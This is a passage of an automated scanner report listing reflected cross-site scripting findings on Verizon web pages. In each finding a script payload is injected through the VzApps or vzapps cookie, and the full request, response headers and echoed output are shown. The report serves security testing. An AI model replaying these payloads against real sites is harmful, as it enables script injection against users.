ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXc9450<script>alert(1)</script>4aca6b8b3b4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92711
Expires: Sat, 20 Nov 2010 03:15:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc9450<script>alert(1)</script>4aca6b8b3b4; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Features & Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC9450<SCRIPT>ALERT(1)</SCRIPT>4ACA6B8B3B4 </DIV>
...[SNIP]...

1.80. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Features/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab748'><script>alert(1)</script>80592d937c4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXab748'><script>alert(1)</script>80592d937c4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92716
Expires: Sat, 20 Nov 2010 03:14:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXab748'><script>alert(1)</script>80592d937c4; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Features & Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAB748'><SCRIPT>ALERT(1)</SCRIPT>80592D937C4 ' />
...[SNIP]...

1.81. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668ed'><script>alert(1)</script>bf2d4cd51f6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX668ed'><script>alert(1)</script>bf2d4cd51f6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 91146
Expires: Sat, 20 Nov 2010 03:14:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX668ed'><script>alert(1)</script>bf2d4cd51f6; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Features & Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX668ED'><SCRIPT>ALERT(1)</SCRIPT>BF2D4CD51F6 ' />
...[SNIP]...

1.82. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 5360b<script>alert(1)</script>87b39a50ac5 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX5360b<script>alert(1)</script>87b39a50ac5; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92738
Expires: Sat, 20 Nov 2010 03:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:29 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5360b<script>alert(1)</script>87b39a50ac5; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Features & Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX5360B<SCRIPT>ALERT(1)</SCRIPT>87B39A50AC5 </DIV>
...[SNIP]...

1.83. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 85766<script>alert(1)</script>8553ba7b684 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX85766<script>alert(1)</script>8553ba7b684; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92738
Expires: Sat, 20 Nov 2010 00:12:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX85766<script>alert(1)</script>8553ba7b684; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Features & Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX85766<SCRIPT>ALERT(1)</SCRIPT>8553BA7B684 </DIV>
...[SNIP]...

1.84. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5b24'><script>alert(1)</script>d2df3510f80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc5b24'><script>alert(1)</script>d2df3510f80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92742
Expires: Sat, 20 Nov 2010 00:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc5b24'><script>alert(1)</script>d2df3510f80; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Features & Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC5B24'><SCRIPT>ALERT(1)</SCRIPT>D2DF3510F80 ' />
...[SNIP]...

1.85. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 790ec<script>alert(1)</script>1fb2881387e was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
